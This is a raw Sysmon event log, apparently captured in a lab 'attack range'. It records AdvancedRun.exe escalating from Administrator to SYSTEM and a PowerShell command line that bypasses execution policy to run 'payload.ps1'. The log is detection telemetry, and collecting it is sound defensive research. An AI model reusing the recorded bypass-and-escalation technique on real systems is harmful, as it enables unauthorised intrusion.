534500x80000000000000004081255Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:18:02.352{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator
734700x80000000000000004080643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:57.471{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=C5114D5A60467157B35D494D927325AB,SHA256=BE91B4149E5C074DE9055BF3914EF746F9776C2771BEA9E0336867A82A827C0DtrueMicrosoft WindowsValidATTACKRANGE\Administrator
10341000x80000000000000004080621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:57.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14F5-61EB-A308-000000002702}5972C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+d7f5c(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2878|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
154100x80000000000000004080620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:57.463{834264DD-14F5-61EB-A308-000000002702}5972C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit -executionpolicy bypass -File "c:\users\Administrator\desktop\payload.ps1"C:\Windows\System32\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=65D86C34814C02569E2AD53FD24E7F61,SHA256=8133502266008B77DE7921451E1210B0EF3F0ED2DB7D8D3EE0C3350D856FA6FA{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -runATTACKRANGE\Administrator
10341000x80000000000000004080606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:53.009{834264DD-DB11-61EA-9500-000000002702}4286008C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:53.008{834264DD-DB11-61EA-9500-000000002702}4286008C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:53.008{834264DD-DB11-61EA-9500-000000002702}4286008C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
734700x80000000000000004080581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.541{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\winsta.dll10.0.14393.0 (rs1_release.160715-1616)Winstation LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationwinsta.dllMD5=74261D485681A12AFF1AD517FD0EF200,SHA256=DEC3B7B1EBF3F7F4940FE63D665E2C50F6447C848C35C64B1BDE446E04358480trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
534500x80000000000000004080575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.544{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeNT AUTHORITY\SYSTEM
10341000x80000000000000004080574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.542{834264DD-DAE6-61EA-0D00-000000002702}8761012C:\Windows\system32\svchost.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM
734700x80000000000000004080573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.532{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\wtsapi32.dll10.0.14393.0 (rs1_release.160715-1616)Windows Remote Desktop Session Host Server SDK APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationwtsapi32.dllMD5=55D5450C85C0A0DE8F2A22F2C0C816AE,SHA256=3CF7B03BEB7C47157C47EACEBFB731096468D1D25FF6784485EFD2FB806C4C5EtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
10341000x80000000000000004080572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.530{834264DD-14EF-61EB-A208-000000002702}37965672C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x10C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1bb7|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+98fa|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004080571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.529{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM
10341000x80000000000000004080570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.528{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM
734700x80000000000000004080569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.523{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.519{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.518{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.517{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.517{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.516{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.515{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.515{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.514{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.513{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.512{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.512{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.512{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.511{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.511{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080554Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.511{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.510{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080552Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.510{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080551Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.510{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080550Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.509{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080549Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.508{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
734700x80000000000000004080548Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.508{834264DD-14EF-61EB-A208-000000002702}3796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM
